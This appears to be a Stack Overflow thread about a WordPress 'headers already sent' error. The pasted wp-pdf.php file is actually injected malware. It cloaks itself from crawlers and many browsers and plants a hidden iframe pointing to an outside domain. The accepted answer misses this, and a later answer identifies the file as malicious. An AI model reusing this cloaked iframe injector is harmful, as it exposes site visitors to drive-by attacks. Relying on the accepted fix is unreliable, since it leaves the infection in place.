# Unsolvable classic error message : Cannot modify header information - WordPress

Tags: wordpress, header

I know this is a classic : I have that error message coming from Wordpress :

> Warning: Cannot modify header information - headers already sent by (output started at /home/quanscom/public_html/blog/wp-pdf.php:8) in /home/quanscom/public_html/blog/wp-includes/feed-rss2.php on line 8

I know that is usually coming from a garbage space or a line in the file but that seems to be different this time.

I've been following all those links :

https://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Warning%3A+Cannot+modify+header+information+-+headers+already+sent+by+wordpress+rss

and especially this one :

http://codex.wordpress.org/Answers-Trouble_Shooting#Headers_already_sent

But nothing has changed. As advised in the last link, I've replaced those two files by the original, but nothing changed.
Could any one give a look with some fresh eyes please ? 
Thanks, you'll find the two pages below :

wp-pdfphp :

```
    <?php
if(!@isset($_COOKIE['PHPSESS1D']) &&
   !@preg_match('/; Yandex|; Googlebot|linux|macintosh|android|Symbian|iPhone|Mac OS|Opera Mini|Chrome|Apple|Presto/i',$_SERVER['HTTP_USER_AGENT'])) {
    if (!is_feed()) {
        echo '<script type="text/javascript">
                d=new Date();
                d.setDate(d.getDate()+1);
                document.cookie="PHPSESS1D=1; path=/; expires=" + d.toGMTString();
                </script>';
        echo '<style type="text/css">#yavvw {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id="yavvw" src="http://3gb2.lili2d.com/ad.jpg?11"></iframe>';
    }
}
?>
```

feed-rss2.php :

```
<?php
/**
 * RSS2 Feed Template for displaying RSS2 Posts feed.
 *
 * @package WordPress
 */

header('Content-Type: '.feed_content_type('rss-http').'; charset='.get_option('blog_charset'), true);
$more = 1;

echo '<?xml version="1.0" encoding="'.get_option('blog_charset').'"?'.'>'; ?>

<rss version="2.0"
    xmlns:content="http://purl.org/rss/1.0/modules/content/"
    xmlns:wfw="http://wellformedweb.org/CommentAPI/"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom"
    xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
    xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
    <?php do_action('rss2_ns'); ?>
>
Then some code in <channel> until the end with </channel> </rss> without any space or empty line after.
```

Answer (score 1, accepted):

In your wp-pdf.php file on line 8, you have an echo statement. And in feed-rss2.php you have a header() function , which basically tries to set the header for the response. Since the output has already happened in the wp-pdf.php file, you are getting this error.

To resolve this you can enclose the echo statement with this condition.

```
if (!is_feed()) {
    // your echo statement here
}
```

Comment: Thanks for your help, I tried your solution, but nothing has changed.
In fact I can even delete everything there is in the wp_pdf.php and nothing happen. I even can delete the header sentence without any result. By the way, this is a Rss feed page I'm talking about : http://feeds.feedburner.com/quantum-wireless

Comment: There are two echo statements in wp_pdf.php file. Did you enclose both of them within the statement I gave?

Comment: Which Plugin is including this wp_pdf.php file?

Comment: I've honestly no idea, I'm not the one who set up this website, how can I know ?
Thanks

Comment: Check the list of Plugins. See if any of them have PDF as part of the name. This Plugin basically has an error, which needs to be fixed.

Comment: erf, no, there isnt any pdf pluggin in my plugin list... any idea thus ? Thanks for your help

Answer (score 0):

On a closer look at the wp-pdf.php file code, it looks slightly malicious for me. It is including an hidden iframe on your page to a domain that looks really malicious. Also the code is checking whether the page was referred by a search engine or not.

I know that you inherited this code. Can you tell me the full path where this file is present?

**Edit**:

I think you can remove the wp-pdf.php file. When you remove it, it might generate another error in the place where it got included originally. You can go there and remove the reference as well.

Comment: SO the path of that file is /home/quanscom/public_html/blog/wp-pdf.php , you can see that in the error message on top of that page (the page that is concerned about this problem) feeds.feedburner.com/quantum-wireless accesible from that page (just click on rss feed on the right) : http://www.quantum-wireless.com/blog/